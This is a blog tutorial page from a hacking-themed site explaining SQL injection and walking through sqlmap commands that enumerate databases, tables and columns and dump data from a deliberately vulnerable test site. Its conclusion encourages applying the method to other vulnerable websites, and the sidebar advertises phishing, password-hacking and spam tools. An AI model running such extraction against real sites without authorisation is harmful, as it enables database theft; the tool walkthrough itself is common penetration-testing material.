Skip to content
hack reveal logo png
HACK REVEAL
  • Home
  • Android
  • Windows
  • Hacks
    • Hacking
    • Reveals
  • Linux
    • kali Linux
    • Exploits
    • Metasploit
  • Tech
    • Cryptocurrency
  • AI Tools
  • Best Product
hack reveal logo png
HACK REVEAL

SQL injection using of SQLMAP

Ankit Chaubey, 19, June 202219, June 2022

TABLE OF CONTENTS

  • 1 What is sql injection ?
  • 2 What is SQLMAP ?
  • 3 Where can you use SQLMAP?
      • 3.0.1 Installing sqlmap command
      • 3.0.2 Open this link in your browser
    • 3.1 1. List information of existing database
    • 3.2 2. List information about Tables present in a particular Database 
    • 3.3 3. List information about the columns of a particular table 
    • 3.4 4. Dump the data from the columns
      • 3.4.1 Conclusion
      • 3.4.2 Sqlmap Cheat Sheet
  • 4 About The Author
    • 4.1 Ankit Chaubey
  • 5 Related

What is sql injection ?

SQL injection is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.

What is SQLMAP ?

SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection.

Where can you use SQLMAP?

When you notice a web url that is of the structure http://testphp.vulnweb.com/listproducts.php?cat=1, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when it is php based.

sql vulnerable
Sql vulnerable

A simple way to check whether your website is vulnerable or not, replace the value in the get request parameter with an asterisk (*), if you got sql error, then we can conclusively say that the website is vulnerable.

Sql vulnerable
Installing sqlmap command
sudo apt-get install sqlmap 

In this tutorial, we will use vulnerable website that is designed for testing purpose.

Open this link in your browser

http://testphp.vulnweb.com/listproducts.php?cat=1

1. List information of existing database

Open your terminal and type

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Where, -u for url and –dbs for database list.

Output showing us that there are two available databases, acuart and information_schema. In some case, the application will tell you that it has identified the database and ask whether you want to test other database types. You can go ahead and type ‘Y’.

2. List information about Tables present in a particular Database 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables 

Where, -u for url , -D for databse, –tables for tables present in database.

We see that 8 tables have been retrieved. So now we can say that the website is definitely vulnerable.

3. List information about the columns of a particular table 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columns

Where, -u for url , -D for databse, -T for table, –columns for column present in table

3 columns found in ‘artists’ table in ‘acuart’ database

4. Dump the data from the columns

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump

Where, -C for column name and –dump for dump data from the column

You can see that we have accessed the data from the database.

Conclusion

Apply this method in such vulnerable websites, You can literally explore through the databases to extract information.

Sqlmap Cheat Sheet

About The Author

Ankit Chaubey

See author's posts

    Related

    Exploits Hacking kali Linux sql injectionsqlmap

    Post navigation

    Previous post
    Next post

    Related Posts

    Hacking What is maltego and how to use it?

    What is Maltego and How to use it?

    1, July 20221, July 2022

    TABLE OF CONTENTS1 What is Maltego?1.1 Why Maltego is so popular?1.2 Using Maltego in Kali linux1.2.1 Maltego Video Tutorial2 About The Author2.1 Ankit ChaubeyWhat is Maltego? Maltego is an open-source intelligence forensic application that helps you to gather more accurate information in a smarter way. In simple words, it is…

    Read More
    kali Linux Best Penetration Testing Tools

    Kali Linux Explained: Everything You Need to Know

    1, June 202221, September 2023

    Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering. It is a multi platform solution,…

    Read More
    How To How to send Infinite SMS messages

    How to send Infinite SMS Messages

    15, September 202315, September 2023

    Sometimes, hackers take pleasure in scaring or making fun of people by saying that their account has been compromised. They do this by sending people an endless stream of spam SMS messages, making it appear that their account has been compromised. These spammers either want to scare people or secretly…

    Read More

    Leave a ReplyCancel reply

    Search

    Recent Posts

    • RapidScan: The Ultimate Multi-Tool Web Vulnerability Scanner
    • Zphisher: The Ultimate Automated Phishing Tool Explained
    • Internet Anonymity 101: The Ultimate Guide for Staying Anonymous Online
    • How to Use Photoshop’s AI Generative Fill In 2023
    • Unlock Instagram Hacks with Inshackle – The Ultimate Tool

    Archives

    • How to Use Photoshop's AI Generative Fill
      How to Use Photoshop’s AI Generative Fill In 2023
    • 40 Best Text to Video AI Tools
    • How to Fix “This account is not allowed to use WhatsApp” Error
      How to Fix “This account is not allowed to use WhatsApp” Error
    • 4 ways to hack cameras
      4 Ways To Hack CCTV Cameras And How To Prevent
    • AI Website Builders
      The 7 Best AI Website Builders In 2023
    • PhoneSploit Pro
      PhoneSploit Pro: Taking Phone Hacking to the Next Level
    • Bypass Your Android Screen Lock Without a Password
      How to Hack/Bypass Android Screen Lock Without a Password
    • Instagram Password Hacking
      Bruteinsta: The Ultimate Instagram Password Hacking Tool?
    • Burner Phone
      What is a Burner Phone: Everything You Need to Know
    • how to access Dark Web
      Exploring the Dark Web: How to Get Started Safely
    • anime face changer
      The Best Ai Anime Editor Apps For Android And iOS
    • How to Unbanned From WhatsApp Quickly In 2023
      How to Unbanned From WhatsApp Quickly In 2023

    AI News (4) AI Tools (10) Android (66) Best Product (29) ChatGPT (1) Cryptocurrency (5) Cyber Security (48) Deal (19) Exploits (11) Games (10) Hacking (79) Hacks (15) How To (64) kali Linux (41) Linux (70) Metasploit (6) Reveals (112) SEO (3) Tech (141) Uncategorized (2) Windows (71) Windows Tips (17)

    ©2023 HACK REVEAL | WordPress Theme by SuperbThemes